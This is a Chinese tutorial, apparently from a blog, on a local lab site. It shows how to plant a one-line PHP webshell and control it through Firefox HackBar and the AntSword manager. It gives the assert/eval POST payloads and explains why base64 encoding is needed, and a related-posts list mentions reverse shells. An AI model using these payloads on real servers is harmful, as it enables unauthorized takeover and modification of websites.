利用火狐HackBar测试登录

在本地站点下创建test.php页面,编写一句话木马,用火狐浏览器的HackBar来执行

第一步

第二步

第三步输出结果

这就是通过post提交值传进来后打印出来

假如我们提交的是这个结果

再次提交,输入 2=phpinfo(); 显示页面

这就是通过火狐演示 一句话木马上线方式

接下来聊一聊

中国蚁剑的使用

第一种方式

利用1=assert&2

第一步

添加数据

第二步

输入URL地址和连接密码,点击测试连接

保存之后显示在数据管理,如下

双击进去,一句话木马已上线

我们就可以随意更改网站的文件以及源码,这里我们在源码前面添加aaa并保存

同时网页也被修改了

再次去修改源码

测试蚁剑能否连接成功

返回数据为空

测试火狐能否返回数据

结果是火狐也无返回数据

这样利用失败的原因究竟是什么呢?

因为eval是一个语言构造器而不是一个函数,不能被可变函数调用

什么是可变函数?

正常函数应该是eval(),此时你的函数式拼接在一起的函数

而你是先提交了eval然后你通过后边的括号把他们俩拼接在一起,你觉得它是一个函数,对吧

这样的函数在php中称之为可变函数

如果你1提交一个phpinfo()的话,就拼接成了phpinfo()这样的函数了

PHP支持可变函数的概念。这意味着如果一个变量名后有圆括号,
PHP将寻找与变量的值同名的函数,并且尝试执行它。
可变函数可以用来实现包括回调函数,函数表在内的一些用途。
但是eval在php中不能算是函数,而是php自身的语言结构,需要用可变的方式调用,需要自己构造,外面包一个自己的函数

请求信息不写,直接在连接密码中填写

连接成功了,那这个过程是怎么样的呢?为什么会连接成功,我们去抓包

设置代理,因为我用的是虚拟机,所以代理填虚拟机网关即可

同样在burpsuit中代理填写网关,端口也是8080

点击蚁剑的测试连接,抓包信息如下

1、首先确定这是一个post提交方式
2、assert中只能执行函数,不能执行字符串
3、而2中有eval函数,不再是字符串,他干了一件什么事,对base64进行了一个解码
4、因为连接器的基础配置当中编码方式为base64,也就是提交的方式为base64编码过的,所以解码需要base64解码
5、恰好assert当中可以放表达式或者函数

思考-----不用编码器可以吗?

(关掉蚁剑和bp的代理)测试:

知道为什么不用编码器会失败吗,因为它放的是字符,

仔细看,从2开始后面没有eval,成了一串字符

而刚刚我们说过assert函数中不能执行字符串,参数必须为表达式或者函数;

一开始我们提交的参数如下

1=assert2=eval(base64_decode(编码器是base64编码,所以提交的值进行base64解码,不解码看不懂))正是因为eval的解码使 $_POST['1']($_POST[2]) 变成了 assert(eval(base64_decode))

那么就有了下面

第二种方式

1=assert

2=eval($_POST[‘传递的值’])

接POST肯定是从body往过传,所以在body中填写对应的值

连接密码填写post提交的值

测试连接,连接成功!

需要注意的是!!!一定要选编码器,不然默认的不编码还是会连接失败

推荐第二种,assert里面是必须要有一个执行函数的,比较符合逻辑,才能提交

成功!

1=assert2=eval($_POST['传递的值'])

失败!

1=assert2=$_POST['传递的值']

俩种方式均可上线,推荐第二种

assert利用蚁剑登录相关推荐

  1. 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

    中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...

  2. PYTHION知识总结和assert利用剑蚁登录

    1.pep8:PEP8是一种编程规范,内容是一些古纳与如何让你的程序更具可读性的建议 2.pickling和unpickling:pickle模块读入任何python对象,将它们转换成字符串,然后使用 ...

  3. 蚁剑连接php3,利用中国蚁剑无文件连接 phpstudy 后门方法

    利用中国蚁剑无文件连接 phpstudy 后门方法 0x01 描述 Phpstudy 是一款 PHP 调试环境的程序集成包, 集成了最新的 Apache,PHP,phpMyAdmin,ZendOpti ...

  4. 渗透测试-流量加密之冰蝎蚁剑

    文章目录 前言 冰蝎 PHP冰蝎马 通信数据包 冰蝎初体验 冰蝎攻与防 蚁剑 蚁剑的安装 蚁剑初体验 蚁剑编码器 蚁剑攻与防 总结 前言 一句话木马是一般是指一段短小精悍的恶意代码,这段代码可以用作一 ...

  5. 菜刀、冰蝎、蚁剑、哥斯拉

    菜刀.冰蝎.蚁剑.哥斯拉 菜刀(最开始是明文传输,后来采用base64加密):PHP类WebShell链接流量 1."eval",eval函数用于执行传递的攻击payload,这是 ...

  6. 【每天学习一点新知识】菜刀、冰蝎、蚁剑、哥斯拉webshell工具分析

    什么是webshell已经在之前的文章里做过讲解了,这里就不再赘述 附上链接:[每天学一点新知识]getshell???webshell???_RexHarrr的博客-CSDN博客 目录 中国菜刀 菜 ...

  7. 菜刀、冰蝎、蚁剑、哥斯拉的流量特征

    干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 文章目录 干货|菜刀.冰蝎.蚁剑.哥斯拉的流量特征 菜刀流量特征 蚁剑(PHP用base64加密): 冰蝎(AES对称加密): 哥斯拉(base64加密): ...

  8. 渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析

    菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析 文章目录 菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析 前言 Webshell简介 中国菜刀 菜刀webshell的静态特征 菜刀webshe ...

  9. [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)

    这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...

最新文章

  1. python怎么画函数图_可视化|Python绘制桑基图
  2. 卷积神经网络(Convolutional Neural Network, CNN)
  3. 推荐策略产品经理:剖析协同过滤(千人千面推荐的核心 )
  4. 动态分辨率是什么意思_b站么么直播最新动态里都有啥 b站什么意思
  5. 在D-Bus适配器中声明信号
  6. codelite在 ubuntu6.04下开启C++11支持
  7. python14张思维导图高清pdf_程序员必备,快速学习 Python 的全套14张思维导图(附高清版下载)...
  8. 选择与Git进行提交意味着什么?
  9. SVN Cleanup失败解决方法
  10. Android XML文件读写
  11. 【 Linux 网络虚拟化 】Openvswitch
  12. linux curl 显示请求耗时和dns解析
  13. VB2010实例(2) _滚动字幕
  14. VMware虚拟机不能连接USB的问题
  15. 超详细设置Idea类注释模板和方法注释模板
  16. 物体检测及分类方法总结(提供了很多论文和代码链接)
  17. volatile限定符
  18. L1正则化和L2正则化的区别
  19. oracle数据泵导出 不全,Oracle RAC数据泵导出问题处理
  20. inkscape如何裁剪_Inkscape进阶教程

热门文章

  1. 黑客窃取马来西亚用户的银行数据
  2. APS排产提高生产效率的五大妙招
  3. 在word中添加mendeley插件
  4. Numerical Optimization Ch10. Least-Squares Problems
  5. 超外差ASK\RF433m、RF315m射频遥控模块解码教程,无线遥控器、电动窗帘遥控、RF遥控器电平信号、协议分析
  6. Statement.execute() 返回值
  7. 李永乐数学基础过关660题线性代数选择题
  8. 微信小程序中实现一个金额摇奖效果
  9. 【Pytorch-从一团乱麻到入门】:3、模型效果评估指标:ROC、AUC、precision、recall
  10. type-cmd命令批量合并txt文件-乱码-编码转换问题